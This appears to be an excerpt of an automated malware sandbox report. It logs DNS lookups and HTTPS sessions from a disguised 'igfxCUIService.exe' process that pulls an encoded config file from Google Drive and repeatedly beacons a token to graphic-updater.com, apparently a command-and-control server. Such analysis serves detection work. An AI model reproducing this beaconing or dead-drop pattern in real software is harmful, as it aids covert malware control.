                                        Jan 11, 2022 17:09:12.354821920 CET8.8.8.8192.168.2.40x6c5eNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:13.128016949 CET8.8.8.8192.168.2.40xb079No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:13.990921974 CET8.8.8.8192.168.2.40xbb27No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:14.722074986 CET8.8.8.8192.168.2.40x4c9cNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:15.595042944 CET8.8.8.8192.168.2.40xd650No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:16.360739946 CET8.8.8.8192.168.2.40xcc37No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:16.685471058 CET8.8.8.8192.168.2.40xf070No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:17.098761082 CET8.8.8.8192.168.2.40x6b05No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:17.492537975 CET8.8.8.8192.168.2.40x3b10No error (0)doc-0k-2o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                        Jan 11, 2022 17:09:17.492537975 CET8.8.8.8192.168.2.40x3b10No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.088094950 CET8.8.8.8192.168.2.40x180bNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.246315956 CET8.8.8.8192.168.2.40xeabdNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.931138039 CET8.8.8.8192.168.2.40xd801No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.977154016 CET8.8.8.8192.168.2.40xbb52No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:19.711582899 CET8.8.8.8192.168.2.40x99a3No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:19.743767977 CET8.8.8.8192.168.2.40xf812No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:20.466077089 CET8.8.8.8192.168.2.40x3ad6No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:20.617664099 CET8.8.8.8192.168.2.40xced1No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:21.240972042 CET8.8.8.8192.168.2.40xa692No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:21.548722982 CET8.8.8.8192.168.2.40x9c4aNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:22.099982023 CET8.8.8.8192.168.2.40x8a7dNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:22.721543074 CET8.8.8.8192.168.2.40x3320No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:22.832529068 CET8.8.8.8192.168.2.40xa330No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:23.453176975 CET8.8.8.8192.168.2.40x79dcNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:23.698251009 CET8.8.8.8192.168.2.40x8c9aNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:24.395878077 CET8.8.8.8192.168.2.40x1f87No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:24.646749973 CET8.8.8.8192.168.2.40x94a1No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:25.207298994 CET8.8.8.8192.168.2.40xe5b2No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:25.468184948 CET8.8.8.8192.168.2.40x5449No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:26.204579115 CET8.8.8.8192.168.2.40x59a2No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:26.207294941 CET8.8.8.8192.168.2.40x3e7dNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.083853006 CET8.8.8.8192.168.2.40x3c14No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.347227097 CET8.8.8.8192.168.2.40xee09No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.422432899 CET8.8.8.8192.168.2.40x7e7No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.907330036 CET8.8.8.8192.168.2.40x90c8No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:28.614734888 CET8.8.8.8192.168.2.40xa4feNo error (0)doc-0k-2o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                        Jan 11, 2022 17:09:28.614734888 CET8.8.8.8192.168.2.40xa4feNo error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.018321991 CET8.8.8.8192.168.2.40xea76No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.084435940 CET8.8.8.8192.168.2.40x3264No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.688075066 CET8.8.8.8192.168.2.40xc799No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.882123947 CET8.8.8.8192.168.2.40x3bbeNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.957529068 CET8.8.8.8192.168.2.40x92b1No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.521503925 CET8.8.8.8192.168.2.40x9e5bNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.758044004 CET8.8.8.8192.168.2.40x5dc7No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.791578054 CET8.8.8.8192.168.2.40x54e8No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • drive.google.com
                                        • doc-0k-2o-docs.googleusercontent.com
                                        • graphic-updater.com

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.449792142.250.181.238443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:02 UTC0OUTGET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: drive.google.com
                                        2022-01-11 16:09:02 UTC0INHTTP/1.1 302 Moved Temporarily
                                        Content-Type: text/html; charset=UTF-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 11 Jan 2022 16:09:02 GMT
                                        Location: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                        Content-Security-Policy: script-src 'nonce-aQZ7MD3qwWYnTaIflt+xJA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        Server: GSE
                                        Set-Cookie: NID=511=rZxf95vblBRpbsrQhgLzt2ykOFOmpXip2Dtfpo1p6H0fjVcc9YaMJ_dv5zhJwmmECKZ0sM1Bj_0xGRZPXYU7TkQggEjNr-46rw61qICTIj1WQU3yNporpvDRugN7FIMTRqfalOrT6ECly2VoGY_E0CMtcBo9mFPOLHmjZUyc74g; expires=Wed, 13-Jul-2022 16:09:02 GMT; path=/; domain=.google.com; HttpOnly
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
                                        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2022-01-11 16:09:02 UTC1INData Raw: 31 37 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 32 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6f 74 33 33
                                        Data Ascii: 179<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot33
                                        2022-01-11 16:09:02 UTC2INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.449793142.250.185.129443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:03 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: doc-0k-2o-docs.googleusercontent.com
                                        2022-01-11 16:09:03 UTC2INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycdsfNTzTdzhXW0v90TbpHTodIpTkSIgvdqCmSsCEJ1765WIIHBf53IHllSgy4KLvpV8XcZPgEPbM33oj1aZYikA
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: text/plain
                                        Content-Disposition: attachment;filename="domain.txt";filename*=UTF-8''domain.txt
                                        Content-Length: 56
                                        Date: Tue, 11 Jan 2022 16:09:03 GMT
                                        Expires: Tue, 11 Jan 2022 16:09:03 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=zkaohA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2022-01-11 16:09:03 UTC6INData Raw: 4e 6d 73 6a 43 53 41 67 57 53 6c 68 61 56 4d 76 4a 7a 30 53 51 48 35 2b 61 69 55 7a 4d 43 55 70 4b 46 64 71 4f 7a 45 67 49 6a 59 4d 49 32 55 68 43 44 78 6d 46 67 3d 3d
                                        Data Ascii: NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.44980323.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:10 UTC10OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:10 UTC10OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:11 UTC10INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:10 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 51
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:11 UTC10INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.44980423.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:11 UTC10OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:11 UTC10OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:12 UTC10INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:12 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 50
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:12 UTC11INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.44980523.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:12 UTC11OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:12 UTC11OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:12 UTC11INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:12 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 49
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:12 UTC11INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.44980623.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:13 UTC11OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:13 UTC11OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:13 UTC11INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 48
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:13 UTC12INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        14192.168.2.44980723.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:14 UTC12OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:14 UTC12OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:14 UTC12INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 47
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:14 UTC12INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.44980823.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:15 UTC12OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:15 UTC12OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:15 UTC12INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 46
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:15 UTC13INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        16192.168.2.44980923.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:15 UTC13OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:15 UTC13OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:16 UTC13INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:16 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 45
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:16 UTC13INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        17192.168.2.44981023.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:16 UTC13OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:16 UTC13OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:16 UTC13INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:16 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 44
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:16 UTC14INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        18192.168.2.449811142.250.181.238443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:17 UTC14OUTGET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: drive.google.com
                                        2022-01-11 16:09:17 UTC14INHTTP/1.1 302 Moved Temporarily
                                        Content-Type: text/html; charset=UTF-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 11 Jan 2022 16:09:17 GMT
                                        Location: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Content-Security-Policy: script-src 'nonce-5keIZmKCFvZxMtIiWYd8eg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                        Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        Server: GSE
                                        Set-Cookie: NID=511=U7Zw5DDcjJNndIDgsQcCkPsYp97yJ46anuamm8ztVdqU5BbQY5yoANLvizAh_LqdU-IvbmXmkVUQIbkrDD95FFXgm0XBltRpJNxxKUsYJ2nxmvRjZIKdoXltO9GA03zBrLXiUkra53XEMmrvBk26lO_LtvgU1uHe6eyUa69rd7w; expires=Wed, 13-Jul-2022 16:09:17 GMT; path=/; domain=.google.com; HttpOnly
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
